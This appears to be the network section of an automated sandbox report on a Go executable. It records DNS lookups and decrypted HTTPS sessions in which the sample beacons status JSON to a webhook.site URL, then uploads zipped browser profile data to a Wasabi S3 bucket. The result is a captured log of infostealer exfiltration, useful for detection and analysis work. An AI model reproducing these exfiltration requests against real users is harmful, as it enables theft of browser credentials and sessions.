          Aug 20, 2024 18:25:12.082967043 CEST4434972846.4.105.116192.168.2.7
          Aug 20, 2024 18:25:12.083177090 CEST49728443192.168.2.746.4.105.116
          Aug 20, 2024 18:25:12.083199024 CEST4434972846.4.105.116192.168.2.7
          Aug 20, 2024 18:25:12.083343029 CEST49728443192.168.2.746.4.105.116
          Aug 20, 2024 18:25:12.083349943 CEST4434972846.4.105.116192.168.2.7
          Aug 20, 2024 18:25:12.084393978 CEST4434972846.4.105.116192.168.2.7
          Aug 20, 2024 18:25:12.084460020 CEST49728443192.168.2.746.4.105.116
          Aug 20, 2024 18:25:12.085172892 CEST49728443192.168.2.746.4.105.116
          Aug 20, 2024 18:25:12.085243940 CEST4434972846.4.105.116192.168.2.7
          Aug 20, 2024 18:25:12.085305929 CEST49728443192.168.2.746.4.105.116
          Aug 20, 2024 18:25:12.128501892 CEST4434972846.4.105.116192.168.2.7
          Aug 20, 2024 18:25:12.132590055 CEST49728443192.168.2.746.4.105.116
          Aug 20, 2024 18:25:12.132603884 CEST4434972846.4.105.116192.168.2.7
          Aug 20, 2024 18:25:12.180340052 CEST49728443192.168.2.746.4.105.116
          Aug 20, 2024 18:25:13.769001007 CEST4434972846.4.105.116192.168.2.7
          Aug 20, 2024 18:25:13.769212961 CEST4434972846.4.105.116192.168.2.7
          Aug 20, 2024 18:25:13.769395113 CEST49728443192.168.2.746.4.105.116
          Aug 20, 2024 18:25:13.770792007 CEST49728443192.168.2.746.4.105.116
          Aug 20, 2024 18:25:13.770811081 CEST4434972846.4.105.116192.168.2.7

          UDP Packets

          TimestampSource PortDest PortSource IPDest IP
          Aug 20, 2024 18:24:53.687571049 CEST6121253192.168.2.71.1.1.1
          Aug 20, 2024 18:24:53.696769953 CEST53612121.1.1.1192.168.2.7
          Aug 20, 2024 18:25:02.106236935 CEST5955253192.168.2.71.1.1.1
          Aug 20, 2024 18:25:02.114430904 CEST53595521.1.1.1192.168.2.7
          Aug 20, 2024 18:25:08.339350939 CEST5980553192.168.2.71.1.1.1
          Aug 20, 2024 18:25:08.348586082 CEST53598051.1.1.1192.168.2.7

          DNS Queries

          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
          Aug 20, 2024 18:24:53.687571049 CEST192.168.2.71.1.1.10x4445Standard query (0)webhook.siteA (IP address)IN (0x0001)false
          Aug 20, 2024 18:25:02.106236935 CEST192.168.2.71.1.1.10xd9e0Standard query (0)s3.ap-southeast-1.wasabisys.comA (IP address)IN (0x0001)false
          Aug 20, 2024 18:25:08.339350939 CEST192.168.2.71.1.1.10xa179Standard query (0)webhook.siteA (IP address)IN (0x0001)false

          DNS Answers

          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
          Aug 20, 2024 18:24:53.696769953 CEST1.1.1.1192.168.2.70x4445No error (0)webhook.site178.63.67.106A (IP address)IN (0x0001)false
          Aug 20, 2024 18:24:53.696769953 CEST1.1.1.1192.168.2.70x4445No error (0)webhook.site178.63.67.153A (IP address)IN (0x0001)false
          Aug 20, 2024 18:24:53.696769953 CEST1.1.1.1192.168.2.70x4445No error (0)webhook.site46.4.105.116A (IP address)IN (0x0001)false
          Aug 20, 2024 18:25:02.114430904 CEST1.1.1.1192.168.2.70xd9e0No error (0)s3.ap-southeast-1.wasabisys.comap-southeast-1.wasabisys.comCNAME (Canonical name)IN (0x0001)false
          Aug 20, 2024 18:25:02.114430904 CEST1.1.1.1192.168.2.70xd9e0No error (0)ap-southeast-1.wasabisys.com154.18.200.103A (IP address)IN (0x0001)false
          Aug 20, 2024 18:25:02.114430904 CEST1.1.1.1192.168.2.70xd9e0No error (0)ap-southeast-1.wasabisys.com154.18.200.101A (IP address)IN (0x0001)false
          Aug 20, 2024 18:25:02.114430904 CEST1.1.1.1192.168.2.70xd9e0No error (0)ap-southeast-1.wasabisys.com154.18.200.102A (IP address)IN (0x0001)false
          Aug 20, 2024 18:25:02.114430904 CEST1.1.1.1192.168.2.70xd9e0No error (0)ap-southeast-1.wasabisys.com154.18.200.100A (IP address)IN (0x0001)false
          Aug 20, 2024 18:25:08.348586082 CEST1.1.1.1192.168.2.70xa179No error (0)webhook.site46.4.105.116A (IP address)IN (0x0001)false
          Aug 20, 2024 18:25:08.348586082 CEST1.1.1.1192.168.2.70xa179No error (0)webhook.site178.63.67.106A (IP address)IN (0x0001)false
          Aug 20, 2024 18:25:08.348586082 CEST1.1.1.1192.168.2.70xa179No error (0)webhook.site178.63.67.153A (IP address)IN (0x0001)false

          HTTP Request Dependency Graph

          • webhook.site
          • s3.ap-southeast-1.wasabisys.com

          HTTPS Proxied Packets

          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          0192.168.2.749701178.63.67.1064432644C:\Users\user\Desktop\file.exe
          TimestampBytes transferredDirectionData
          2024-08-20 16:24:55 UTC183OUTPOST /efe6628a-60cc-4d7a-bd08-479e31e08de5 HTTP/1.1
          Host: webhook.site
          User-Agent: Go-http-client/1.1
          Content-Length: 284
          Content-Type: application/json
          Accept-Encoding: gzip
          2024-08-20 16:24:55 UTC284OUTData Raw: 7b 22 64 65 76 69 63 65 5f 69 64 22 3a 22 31 39 38 38 32 37 34 32 2d 43 43 35 36 2d 31 41 35 39 2d 39 37 37 39 2d 46 42 38 43 42 46 41 31 45 32 39 44 22 2c 22 65 72 72 6f 72 22 3a 22 22 2c 22 6f 73 5f 76 65 72 73 69 6f 6e 22 3a 22 57 69 6e 64 6f 77 73 20 31 30 20 31 30 2e 30 2e 31 39 30 34 35 22 2c 22 73 65 73 73 69 6f 6e 5f 69 64 22 3a 22 38 64 39 65 37 64 65 63 2d 31 39 37 37 2d 34 65 34 39 2d 62 33 39 37 2d 37 34 66 39 35 64 65 35 39 31 64 32 22 2c 22 73 74 61 74 65 22 3a 22 53 74 61 72 74 69 6e 67 20 73 63 72 69 70 74 22 2c 22 74 69 6d 65 73 74 61 6d 70 22 3a 31 37 32 34 31 37 31 30 39 32 2c 22 75 73 65 72 5f 64 61 74 61 5f 70 61 74 68 22 3a 22 43 3a 5c 5c 55 73 65 72 73 5c 5c 66 72 6f 6e 74 64 65 73 6b 5c 5c 41 70 70 44 61 74 61 5c 5c 4c 6f 63 61 6c
          Data Ascii: {"device_id":"19882742-CC56-1A59-9779-FB8CBFA1E29D","error":"","os_version":"Windows 10 10.0.19045","session_id":"8d9e7dec-1977-4e49-b397-74f95de591d2","state":"Starting script","timestamp":1724171092,"user_data_path":"C:\\Users\\user\\AppData\\Local
          2024-08-20 16:24:56 UTC294INHTTP/1.1 200 OK
          server: nginx
          content-type: text/html; charset=UTF-8
          transfer-encoding: chunked
          x-request-id: 6b9db9d9-bf1c-4b36-b863-cff940d9ab5b
          x-token-id: efe6628a-60cc-4d7a-bd08-479e31e08de5
          cache-control: no-cache, private
          date: Tue, 20 Aug 2024 16:24:56 GMT
          connection: close
          2024-08-20 16:24:56 UTC156INData Raw: 39 31 0d 0a 54 68 69 73 20 55 52 4c 20 68 61 73 20 6e 6f 20 64 65 66 61 75 6c 74 20 63 6f 6e 74 65 6e 74 20 63 6f 6e 66 69 67 75 72 65 64 2e 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 65 62 68 6f 6f 6b 2e 73 69 74 65 2f 23 21 2f 76 69 65 77 2f 65 66 65 36 36 32 38 61 2d 36 30 63 63 2d 34 64 37 61 2d 62 64 30 38 2d 34 37 39 65 33 31 65 30 38 64 65 35 22 3e 56 69 65 77 20 69 6e 20 57 65 62 68 6f 6f 6b 2e 73 69 74 65 3c 2f 61 3e 2e 0d 0a 30 0d 0a 0d 0a
          Data Ascii: 91This URL has no default content configured. <a href="https://webhook.site/#!/view/efe6628a-60cc-4d7a-bd08-479e31e08de5">View in Webhook.site</a>.0


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          1192.168.2.749706178.63.67.1064432644C:\Users\user\Desktop\file.exe
          TimestampBytes transferredDirectionData
          2024-08-20 16:24:58 UTC183OUTPOST /efe6628a-60cc-4d7a-bd08-479e31e08de5 HTTP/1.1
          Host: webhook.site
          User-Agent: Go-http-client/1.1
          Content-Length: 292
          Content-Type: application/json
          Accept-Encoding: gzip
          2024-08-20 16:24:58 UTC292OUTData Raw: 7b 22 64 65 76 69 63 65 5f 69 64 22 3a 22 31 39 38 38 32 37 34 32 2d 43 43 35 36 2d 31 41 35 39 2d 39 37 37 39 2d 46 42 38 43 42 46 41 31 45 32 39 44 22 2c 22 65 72 72 6f 72 22 3a 22 22 2c 22 6f 73 5f 76 65 72 73 69 6f 6e 22 3a 22 57 69 6e 64 6f 77 73 20 31 30 20 31 30 2e 30 2e 31 39 30 34 35 22 2c 22 73 65 73 73 69 6f 6e 5f 69 64 22 3a 22 38 64 39 65 37 64 65 63 2d 31 39 37 37 2d 34 65 34 39 2d 62 33 39 37 2d 37 34 66 39 35 64 65 35 39 31 64 32 22 2c 22 73 74 61 74 65 22 3a 22 43 6f 70 79 69 6e 67 20 66 69 6c 65 73 20 63 6f 6d 70 6c 65 74 65 64 22 2c 22 74 69 6d 65 73 74 61 6d 70 22 3a 31 37 32 34 31 37 31 30 39 36 2c 22 75 73 65 72 5f 64 61 74 61 5f 70 61 74 68 22 3a 22 43 3a 5c 5c 55 73 65 72 73 5c 5c 66 72 6f 6e 74 64 65 73 6b 5c 5c 41 70 70 44 61 74
          Data Ascii: {"device_id":"19882742-CC56-1A59-9779-FB8CBFA1E29D","error":"","os_version":"Windows 10 10.0.19045","session_id":"8d9e7dec-1977-4e49-b397-74f95de591d2","state":"Copying files completed","timestamp":1724171096,"user_data_path":"C:\\Users\\user\\AppDat
          2024-08-20 16:24:59 UTC294INHTTP/1.1 200 OK
          server: nginx
          content-type: text/html; charset=UTF-8
          transfer-encoding: chunked
          x-request-id: 17db4c4b-90bf-42c1-be60-dacc3c904132
          x-token-id: efe6628a-60cc-4d7a-bd08-479e31e08de5
          cache-control: no-cache, private
          date: Tue, 20 Aug 2024 16:24:59 GMT
          connection: close
          2024-08-20 16:24:59 UTC156INData Raw: 39 31 0d 0a 54 68 69 73 20 55 52 4c 20 68 61 73 20 6e 6f 20 64 65 66 61 75 6c 74 20 63 6f 6e 74 65 6e 74 20 63 6f 6e 66 69 67 75 72 65 64 2e 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 65 62 68 6f 6f 6b 2e 73 69 74 65 2f 23 21 2f 76 69 65 77 2f 65 66 65 36 36 32 38 61 2d 36 30 63 63 2d 34 64 37 61 2d 62 64 30 38 2d 34 37 39 65 33 31 65 30 38 64 65 35 22 3e 56 69 65 77 20 69 6e 20 57 65 62 68 6f 6f 6b 2e 73 69 74 65 3c 2f 61 3e 2e 0d 0a 30 0d 0a 0d 0a
          Data Ascii: 91This URL has no default content configured. <a href="https://webhook.site/#!/view/efe6628a-60cc-4d7a-bd08-479e31e08de5">View in Webhook.site</a>.0


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          2192.168.2.749710178.63.67.1064432644C:\Users\user\Desktop\file.exe
          TimestampBytes transferredDirectionData
          2024-08-20 16:25:00 UTC183OUTPOST /efe6628a-60cc-4d7a-bd08-479e31e08de5 HTTP/1.1
          Host: webhook.site
          User-Agent: Go-http-client/1.1
          Content-Length: 292
          Content-Type: application/json
          Accept-Encoding: gzip
          2024-08-20 16:25:00 UTC292OUTData Raw: 7b 22 64 65 76 69 63 65 5f 69 64 22 3a 22 31 39 38 38 32 37 34 32 2d 43 43 35 36 2d 31 41 35 39 2d 39 37 37 39 2d 46 42 38 43 42 46 41 31 45 32 39 44 22 2c 22 65 72 72 6f 72 22 3a 22 22 2c 22 6f 73 5f 76 65 72 73 69 6f 6e 22 3a 22 57 69 6e 64 6f 77 73 20 31 30 20 31 30 2e 30 2e 31 39 30 34 35 22 2c 22 73 65 73 73 69 6f 6e 5f 69 64 22 3a 22 38 64 39 65 37 64 65 63 2d 31 39 37 37 2d 34 65 34 39 2d 62 33 39 37 2d 37 34 66 39 35 64 65 35 39 31 64 32 22 2c 22 73 74 61 74 65 22 3a 22 5a 69 70 70 69 6e 67 20 66 69 6c 65 73 20 63 6f 6d 70 6c 65 74 65 64 22 2c 22 74 69 6d 65 73 74 61 6d 70 22 3a 31 37 32 34 31 37 31 30 39 38 2c 22 75 73 65 72 5f 64 61 74 61 5f 70 61 74 68 22 3a 22 43 3a 5c 5c 55 73 65 72 73 5c 5c 66 72 6f 6e 74 64 65 73 6b 5c 5c 41 70 70 44 61 74
          Data Ascii: {"device_id":"19882742-CC56-1A59-9779-FB8CBFA1E29D","error":"","os_version":"Windows 10 10.0.19045","session_id":"8d9e7dec-1977-4e49-b397-74f95de591d2","state":"Zipping files completed","timestamp":1724171098,"user_data_path":"C:\\Users\\user\\AppDat
          2024-08-20 16:25:02 UTC294INHTTP/1.1 200 OK
          server: nginx
          content-type: text/html; charset=UTF-8
          transfer-encoding: chunked
          x-request-id: 5e2d3725-a262-47d8-a905-7db3b171f41d
          x-token-id: efe6628a-60cc-4d7a-bd08-479e31e08de5
          cache-control: no-cache, private
          date: Tue, 20 Aug 2024 16:25:01 GMT
          connection: close
          2024-08-20 16:25:02 UTC156INData Raw: 39 31 0d 0a 54 68 69 73 20 55 52 4c 20 68 61 73 20 6e 6f 20 64 65 66 61 75 6c 74 20 63 6f 6e 74 65 6e 74 20 63 6f 6e 66 69 67 75 72 65 64 2e 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 65 62 68 6f 6f 6b 2e 73 69 74 65 2f 23 21 2f 76 69 65 77 2f 65 66 65 36 36 32 38 61 2d 36 30 63 63 2d 34 64 37 61 2d 62 64 30 38 2d 34 37 39 65 33 31 65 30 38 64 65 35 22 3e 56 69 65 77 20 69 6e 20 57 65 62 68 6f 6f 6b 2e 73 69 74 65 3c 2f 61 3e 2e 0d 0a 30 0d 0a 0d 0a
          Data Ascii: 91This URL has no default content configured. <a href="https://webhook.site/#!/view/efe6628a-60cc-4d7a-bd08-479e31e08de5">View in Webhook.site</a>.0


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          3192.168.2.749715154.18.200.1034432644C:\Users\user\Desktop\file.exe
          TimestampBytes transferredDirectionData
          2024-08-20 16:25:03 UTC590OUTPOST /browser-profiles/20240820122501-19882742-CC56-1A59-9779-FB8CBFA1E29D.zip?uploads= HTTP/1.1
          Host: s3.ap-southeast-1.wasabisys.com
          User-Agent: aws-sdk-go/1.55.5 (go1.22.6; windows; amd64)
          Content-Length: 0
          Authorization: AWS4-HMAC-SHA256 Credential=28JW7MUJ64BNM9GCHFBF/20240820/ap-southeast-1/s3/aws4_request, SignedHeaders=host;x-amz-content-sha256;x-amz-date, Signature=08f9635fce07af93c32765f5b0de2f24b79800a6184f390b0243f2d3c01997e3
          X-Amz-Content-Sha256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
          X-Amz-Date: 20240820T162501Z
          Accept-Encoding: gzip
          2024-08-20 16:25:03 UTC393INHTTP/1.1 200 OK
          Connection: close
          Date: Tue, 20 Aug 2024 16:25:03 GMT
          Server: WasabiS3/7.20.2957-2024-08-05-c5ee44c55d (R113-U11)
          x-amz-id-2: oc6i1HmUsYwTRKYr7xlLd5t2qnZesCa6SRHkDyAbuMttdSZubSTPkC+FFBgwTuzOZ7kdbhTsHFy7
          x-amz-request-id: F3F49ABA52A1E10D:B
          x-wasabi-cm-reference-id: 1724171102778 154.18.200.103 ConID:169041055/EngineConID:1616589/Core:105
          Transfer-Encoding: chunked
          2024-08-20 16:25:03 UTC410INData Raw: 31 38 65 0d 0a 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 0a 3c 49 6e 69 74 69 61 74 65 4d 75 6c 74 69 70 61 72 74 55 70 6c 6f 61 64 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 73 33 2e 61 6d 61 7a 6f 6e 61 77 73 2e 63 6f 6d 2f 64 6f 63 2f 32 30 30 36 2d 30 33 2d 30 31 2f 22 3e 3c 42 75 63 6b 65 74 3e 62 72 6f 77 73 65 72 2d 70 72 6f 66 69 6c 65 73 3c 2f 42 75 63 6b 65 74 3e 3c 4b 65 79 3e 32 30 32 34 30 38 32 30 31 32 32 35 30 31 2d 31 39 38 38 32 37 34 32 2d 43 43 35 36 2d 31 41 35 39 2d 39 37 37 39 2d 46 42 38 43 42 46 41 31 45 32 39 44 2e 7a 69 70 3c 2f 4b 65 79 3e 3c 55 70 6c 6f 61 64 49 64 3e 62 74 32 34 6b 6e 5f 7a 54 62 63 48 56 36 57 5a 32 77 42 65 6c 78 75
          Data Ascii: 18e<?xml version="1.0" encoding="UTF-8"?><InitiateMultipartUploadResult xmlns="http://s3.amazonaws.com/doc/2006-03-01/"><Bucket>browser-profiles</Bucket><Key>20240820122501-19882742-CC56-1A59-9779-FB8CBFA1E29D.zip</Key><UploadId>bt24kn_zTbcHV6WZ2wBelxu


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          4192.168.2.749716154.18.200.1034432644C:\Users\user\Desktop\file.exe
          TimestampBytes transferredDirectionData
          2024-08-20 16:25:05 UTC802OUTPUT /browser-profiles/20240820122501-19882742-CC56-1A59-9779-FB8CBFA1E29D.zip?partNumber=1&uploadId=bt24kn_zTbcHV6WZ2wBelxuQuTB6bMyvqDG8ICCHDMuT8Ws51JiOVQZ1BkDAFBiKM2iS4oGmGpChjjt6JN_wIds5sVNMf_XCqt7VRODSc28icvta8mfCv1iVnXr_-TlR HTTP/1.1
          Host: s3.ap-southeast-1.wasabisys.com
          User-Agent: aws-sdk-go/1.55.5 (go1.22.6; windows; amd64)
          Content-Length: 408281
          Authorization: AWS4-HMAC-SHA256 Credential=28JW7MUJ64BNM9GCHFBF/20240820/ap-southeast-1/s3/aws4_request, SignedHeaders=content-length;content-md5;host;x-amz-content-sha256;x-amz-date, Signature=874e2af0e01abbe800a9f5817df22d076ef9457e12856e0c7bebf2238707413c
          Content-Md5: n1ktmCzSDSUdpmw/ZAWvmg==
          X-Amz-Content-Sha256: fa833dde53c53abb4736f9ab28d2affca313367dba03f9726fdfa59964652164
          X-Amz-Date: 20240820T162502Z
          Accept-Encoding: gzip
          2024-08-20 16:25:05 UTC2372OUTData Raw: 50 4b 03 04 14 00 08 08 08 00 1b 63 14 59 00 00 00 00 00 00 00 00 00 00 00 00 2b 00 09 00 55 73 65 72 20 44 61 74 61 20 54 65 6d 70 5c 44 65 66 61 75 6c 74 5c 41 66 66 69 6c 69 61 74 69 6f 6e 20 44 61 74 61 62 61 73 65 55 54 05 00 01 57 c3 c4 66 ec da cd 6e e3 54 14 c0 f1 eb ba 8d db 84 d6 65 51 45 a8 12 ba d5 80 88 35 09 28 42 ac ba 80 90 9a 21 22 75 a6 69 8a e8 ca 72 93 db c1 10 c7 69 ec 8c a6 cb cc ec 79 1d 5e 60 36 b3 82 47 18 16 6c 91 d8 b1 44 ce 47 1b 67 5a 05 56 03 d1 ff 27 b5 ca f1 b1 af 8f cf 75 22 5d cb a7 27 75 3f 56 f2 32 1c 04 5e 2c 3f 15 bb 42 d3 c4 17 52 0a 21 36 84 10 39 71 2b 23 84 58 9f 8b 35 b1 dc 86 f8 f8 87 5f b7 cd bf 44 36 fb 5a 98 4f cc 5f 76 7e de 51 db fa ce 07 ef 5c e7 7e ca be ce 9d 2c 1b 00 00 00 00 f8 37 c2 2d 23 6f 59 da e8
          Data Ascii: PKcY+User Data Temp\Default\Affiliation DatabaseUTWfnTeQE5(B!"uiriy^`6GlDGgZV'u"]'u?V2^,?BR!69q+#X5_D6ZO_v~Q\~,7-#oY
          2024-08-20 16:25:05 UTC3558OUTData Raw: a4 da 95 9c 72 51 94 44 14 f8 df 8b 1f c3 bb bf e8 1b 8c c9 c7 80 0f 88 bc b0 3e 3a e8 56 10 26 2b e1 60 9c 03 a7 73 1c e6 e7 6d d2 29 9b 31 6b 1f 1c 4c 3f 7d b2 99 62 88 fd fd f7 5f 56 0e 26 38 1d df 12 8c 37 1f 2e da c5 de f8 b0 14 44 e7 27 ff 81 ce 8b 10 b7 30 69 08 36 ce 19 da de 58 fd 01 f7 39 62 73 22 a2 ae 69 b9 13 aa 61 84 29 26 55 4d 65 59 d7 4c 70 c2 b8 6c f6 52 aa ea 48 0b 42 8e 6a 7f 14 b2 3a 29 2a a4 da ef 4e 9c 35 b4 fa 6e 88 03 4c 59 27 db 82 bb 76 e0 f4 5f b3 d2 52 10 fa 9c 95 72 8a b7 9b c7 76 f3 15 00 00 ff ff 50 4b 07 08 e2 1a 5b 03 02 01 00 00 9e 01 00 00 50 4b 03 04 14 00 08 08 08 00 1b 63 14 59 00 00 00 00 00 00 00 00 00 00 00 00 2a 00 09 00 55 73 65 72 20 44 61 74 61 20 54 65 6d 70 5c 44 65 66 61 75 6c 74 5c 42 75 64 67 65 74 44 61
          Data Ascii: rQD>:V&+`sm)1kL?}b_V&87.D'0i6X9bs"ia)&UMeYLplRHBj:)*N5nLY'v_RrvPK[PKcY*User Data Temp\Default\BudgetDa
          2024-08-20 16:25:05 UTC4744OUTData Raw: 00 00 ff ff 50 4b 07 08 00 00 00 00 05 00 00 00 00 00 00 00 50 4b 03 04 14 00 08 08 08 00 1b 63 14 59 00 00 00 00 00 00 00 00 00 00 00 00 2c 00 09 00 55 73 65 72 20 44 61 74 61 20 54 65 6d 70 5c 44 65 66 61 75 6c 74 5c 45 78 74 65 6e 73 69 6f 6e 20 53 63 72 69 70 74 73 5c 4c 4f 47 55 54 05 00 01 57 c3 c4 66 b4 ce b1 6e 83 30 10 c6 f1 9d a7 b0 d4 19 30 76 a9 28 1b 02 5a 55 6a 3b 84 64 f3 62 99 83 a0 38 3e 64 9b 28 8f 1f e1 88 2d 52 a6 dc 7a 7f 7d fa 31 ca 78 9a d1 94 e6 31 2d ca 77 56 32 9e 7c 14 05 61 39 28 b2 83 c5 4d 66 24 7f d5 ff cf 57 db ed 49 5d 8a 83 03 eb c4 60 d1 f8 1e dc 49 54 f3 dc 48 2f c5 2f 2a a9 c5 37 e2 a8 41 d4 47 8b 67 08 2d 09 df 06 06 b9 68 2f da ab 07 e3 26 34 a4 53 76 9a bd 4b b7 ed 98 ae 97 45 8f 41 9f 1b 48 e1 05 ec 6a d2 38 92 37
          Data Ascii: PKPKcY,User Data Temp\Default\Extension Scripts\LOGUTWfn00v(ZUj;db8>d(-Rz}1x1-wV2|a9(Mf$WI]`ITH//*7AGg-h/&4SvKEAHj87
          2024-08-20 16:25:05 UTC5930OUTData Raw: fb 38 c0 c3 3f c1 91 a1 36 b8 eb 53 a4 11 8d 02 18 ce 10 41 ff 21 62 4c 03 39 f8 bd 13 53 13 92 fe fd 79 d0 c6 0e 09 46 6b 13 84 9b ae c0 9d f7 f6 41 65 9d 17 ba 3f fd 02 ba 2f 7e 01 15 6d 88 df 39 8b 10 55 e1 01 73 b5 40 4d 35 54 30 ba 04 41 77 0a 2d ec 1a d0 c6 77 17 c6 3a c7 d0 90 d4 3a 66 b2 b6 41 a4 a5 19 22 cc cd b0 32 ab 17 56 ae ee 83 08 7b 2b 44 da 5b c0 98 da 46 75 29 ad 63 e6 8c 31 8c 49 6d c9 97 ef 1d 95 fd f2 14 93 b5 d3 1d 97 ea 45 63 72 3b 98 ed ed 82 c5 de 4e b4 2b 5b 41 1b df 02 a6 c4 76 62 4a 68 13 0c 09 6d c4 62 1b 45 7d 7c ab 5b a5 b8 3c 45 ba 87 f8 35 bc d4 d2 3e cd 6c ef ce b7 38 fb 3c b1 29 c3 68 71 f4 a2 d9 d6 09 66 3b 43 0f 5a 9c 43 68 b2 f5 50 a3 bd bb 20 70 65 cb 54 c5 84 34 7e 2f 1a 6d 1d 71 16 e7 e0 5e 8b b3 f7 33 f1 b9 d2 cd
          Data Ascii: 8?6SA!bL9SyFkAe?/~m9Us@M5T0Aw-w::fA"2V{+D[Fu)c1ImEcr;N+[AvbJhmbE}|[<E5>l8<)hqf;CZChP peT4~/mq^3
          2024-08-20 16:25:05 UTC7116OUTData Raw: ba 0a 8d f6 8e fb 34 09 ed ca af aa e7 ff 6f 49 2d 61 c3 3f ee a7 18 4f 6c 0e 8b 7e be 83 27 17 2f 48 7c 72 49 72 f2 ae a0 8d 89 bb 97 be 9c bc 3b e8 82 75 77 d0 68 d2 ee 65 b0 f4 c5 e7 c8 6d 15 38 72 47 c5 f5 f7 ef a8 f0 3e ff ad 4a 61 ab e2 2d af 49 e1 1a 9e ef ab ef 45 fc f6 2d e7 ec df 34 3d a6 b8 5d 66 f9 1e bb 6c d5 66 db 9e e0 73 dc af 90 17 8c d6 ec 20 8e e4 3d c1 60 db b3 08 62 8b d2 70 72 e5 08 4c aa 12 70 b2 0b 70 52 35 e2 1d 6e c4 49 55 de b3 b7 57 08 5b 14 55 18 e3 ab fb 56 eb 5f b7 4a f2 7e db 5d 4b d5 b6 6c 55 a9 2d 27 f8 6a 4a b9 0a 6d b9 4a b4 66 07 0b b6 ec 60 21 79 4f a0 60 cd 09 22 d6 1c 25 58 73 82 c0 b6 27 08 55 2f 14 c3 1d 55 88 53 2b c6 e8 e4 4a 81 4c ae 20 c2 14 37 e2 94 77 11 27 55 d2 96 49 15 f4 49 c5 89 61 71 be 8d ff 5c 3f 26
          Data Ascii: 4oI-a?Ol~'/H|rIr;uwhem8rG>Ja-IE-4=]flfs =`bprLppR5nIUW[UV_J~]KlU-'jJmJf`!yO`"%Xs'U/US+JL 7w'UIIaq\?&
          2024-08-20 16:25:05 UTC8302OUTData Raw: 76 31 f9 e2 a4 31 99 c0 3b c6 cb e4 f1 b2 f8 e9 61 b2 77 9e e7 cf ea ff 45 b9 6f 96 98 2e 46 7b f7 7d b1 a9 dd d9 16 67 e7 2b 71 ce ae cb 16 47 cf c0 b8 2e 3d 03 66 47 e7 e5 d8 14 a6 6b 77 b6 25 a5 79 c3 ff 6d 99 ff 5f fa ef 49 6a 29 66 e1 63 ff 0b fb b4 a4 74 9b e2 45 c5 97 be 9f 5f b9 6b a9 3a 79 77 e0 0f 13 77 05 ed 49 de 1d 78 3c 79 77 d0 c7 c9 bb 83 bb 92 77 2b af db 76 2d 80 85 2f bd 4d 6f ab c4 b1 3b 2a c6 3a 6f af 14 3e ba bd 42 78 fb f6 4a e1 99 6f 57 91 ef 2b aa 30 ea 4b ad bc 88 df fe a6 df 6d ff 2f a5 db e4 ef 89 e5 bc 2d 2f 28 d9 9a 1d f4 8c 75 4f f0 7b c9 d9 41 d7 6c f9 c1 68 2f 54 a2 3d 3f 18 6d b9 c1 52 7c 02 25 da 9e 99 4f 2d 45 69 30 a9 72 0c ef a8 a2 62 6c 82 5a c4 3b ea 11 ef a8 41 bc a3 92 5e bd a3 92 9e bd bd 8a 3e 7d bb 1b 93 27 b4
          Data Ascii: v11;awEo.F{}g+qG.=fGkw%ym_Ij)fctE_k:ywwIx<yww+v-/Mo;*:o>BxJoW+0Km/-/(uO{Alh/T=?mR|%O-Ei0rblZ;A^>}'
          2024-08-20 16:25:05 UTC746OUTData Raw: b3 79 74 e2 2f 87 f9 ff ee 7f a9 73 82 c0 3e 58 99 14 8e d4 a6 9c 2d de 94 4a c3 95 c9 23 12 1f 5e 52 c6 cc 59 25 f3 73 c9 9c 5e c1 ca 14 5b bf ce 57 c8 8e 3d 84 50 db d4 ce 55 48 e3 88 e7 fb 9a 0d f9 bb bf 0c 93 9a 28 9d d6 c0 df e9 e5 f9 ac 4c 95 df 6a 2a d7 3f 55 65 ca a8 9c 60 06 89 cd 13 86 3c 35 44 a3 53 5b 29 9d 72 80 74 4e 7a ce 08 71 2c de 67 0e c4 35 4e a0 22 e9 e3 c5 75 a9 17 23 1b 53 78 fe b0 ea 14 95 2f 2c 6c cb 11 a6 f7 a7 28 ec 43 b6 fc 62 29 36 ce f4 3e 2b ff 58 8a 9e 77 8c 8c b5 9d 6c 87 2b e6 c1 8d ff 75 8c 4c 66 1c 34 0e c3 b4 06 93 d8 72 8d 35 9a 2a cf d6 d4 66 6b 6c aa 96 73 6b 74 9e 36 55 a2 53 0f 50 3a f5 00 5c 9c dc 68 7e 04 31 79 bf 38 10 d8 87 2a 53 3e 5b b2 29 95 46 6a 30 df 98 19 12 39 c7 42 a8 6f 2b 72 99 71 0d 5c 95 d7 4c af
          Data Ascii: yt/s>X-J#^RY%s^[W=PUH(Lj*?Ue`<5DS[)rtNzq,g5N"u#Sx/,l(Cb)6>+Xwl+uLf4r5*fklskt6USP:\h~1y8*S>[)Fj09Bo+rq\L
